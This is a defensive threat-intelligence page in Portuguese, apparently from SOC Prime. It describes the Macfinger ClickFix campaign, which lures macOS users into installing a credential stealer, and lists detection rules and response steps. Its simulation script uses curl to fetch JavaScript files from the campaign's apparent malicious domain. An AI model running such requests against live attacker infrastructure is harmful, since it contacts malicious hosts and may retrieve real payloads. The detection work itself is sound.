SOC Prime Bias: High

24 Sep 2026 06:40 UTC

Campanha ClickFix da Macfinger

Author Photo
SOC Prime Team linkedin icon Seguir
Campanha ClickFix da Macfinger
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma nova campanha de engenharia social rastreada como Macfinger ClickFix visa usuários do macOS injetando scripts maliciosos em sites legítimos. O ataque apresenta páginas falsas de proteção contra bots que enganam as vítimas para executar comandos que baixam malware específico para macOS. O payload parece ser uma variante do Atomic macOS Stealer (AMOS) projetado para roubar credenciais e outras informações do usuário.

Investigação

A investigação identificou sites legítimos comprometidos com scripts injetados que exibem pop-ups de verificação falsos. A análise do tráfego de rede revelou um domínio dedicado usado para rastreamento de usuários, junto com vários endereços IP que dão suporte à entrega de malware e comunicações de Comando e Controle (C2). Padrões de tráfego observados indicam exfiltração de credenciais e informações do sistema por meio de requisições HTTP POST.

Mitigação

Os usuários devem ser treinados para evitar seguir instruções apresentadas por pop-ups de navegador inesperados ou páginas falsas de verificação de bots. As organizações devem implantar filtros da web para bloquear domínios maliciosos conhecidos e endereços IP associados às campanhas ClickFix. Também é recomendado monitorar conexões de saída incomuns para endereços IP não confiáveis em portas não padrão.

Resposta

Se a atividade do Macfinger ClickFix for detectada, os hosts macOS afetados devem ser isolados imediatamente para interromper a exfiltração de dados. Os respondedores devem realizar uma investigação forense completa para determinar a extensão do comprometimento de credenciais. As credenciais potencialmente expostas devem ser redefinidas, e os sistemas devem ser verificados quanto a mecanismos de persistência, como scripts de shell não autorizados ou binários Mach-O.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Tentativa de Comunicação de Lookup de Domínio de IP Possível (via dns)

Equipe SOC Prime
23 Set 2026

Comando e Controle Suspeito por Pedido DNS de Domínio de Nível Superior Incomum (TLD) (via dns)

Equipe SOC Prime
23 Set 2026

Possível Tentativa de Enumeração System_profiler (via process_creation)

Equipe SOC Prime
23 Set 2026

Possível Manipulação de Strings Codificadas em Base64 [MacOS] (via cmdline)

Equipe SOC Prime
23 Set 2026

Tentativa Suspeita de Execução de Curl [MacOS] (via cmdline)

Equipe SOC Prime
23 Set 2026

IOCs (HashSha256) para detectar: campanha Macfinger ClickFix

Regras AI do SOC Prime
23 Set 2026

IOCs (SourceIP) para detectar: campanha Macfinger ClickFix

Regras AI do SOC Prime
23 Set 2026

IOCs (DestinationIP) para detectar: campanha Macfinger ClickFix

Regras AI do SOC Prime
23 Set 2026

Detectar Tráfego da Campanha Macfinger ClickFix [Firewall]

Regras AI do SOC Prime
23 Set 2026

Detectar Injeção de Script Macfinger ClickFix [Servidor Web]

Regras AI do SOC Prime
23 Set 2026

Execução de Simulação

  • Narrativa & Comandos do Ataque: Um adversário usa uma técnica de engenharia social conhecida como “ClickFix”, onde o usuário é levado a clicar em um botão (frequentemente um falso “conserto” ou “atualização”) que executa um script malicioso. Nesta simulação, imitamos a fase final: o navegador/agente do lado do cliente fazendo uma requisição ao domínio controlado por Macfinger velvet-otter-glagceis.life para buscar um .js arquivo malicioso. Esta requisição é projetada para corresponder a um dos três critérios de seleção específicos na lógica de detecção.

  • Script de Teste de Regressão:

    #!/bin/bash
    # Script de simulação para acionar a regra de detecção Macfinger ClickFix
    
    echo "[*] Iniciando Simulação do Macfinger ClickFix..."
    
    # Alvo 1: seleção1 (parâmetro do site)
    echo "[*] Simulando requisição para seleção1..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload"
    
    # Alvo 2: seleção2 (arquivo de hash específico)
    echo "[*] Simulando requisição para seleção2..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js"
    
    # Alvo 3: seleção3 (arquivo ext-b)
    echo "[*] Simulando requisição para seleção3..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js"
    
    echo "[+] Simulação completa. Verifique o SIEM para alertas."
  • Comandos de Limpeza:

    # Nenhuma limpeza local necessária, pois são requisições de rede de saída.
    # Se arquivos locais foram criados, removê-los:
    rm -f /tmp/macfinger_test_*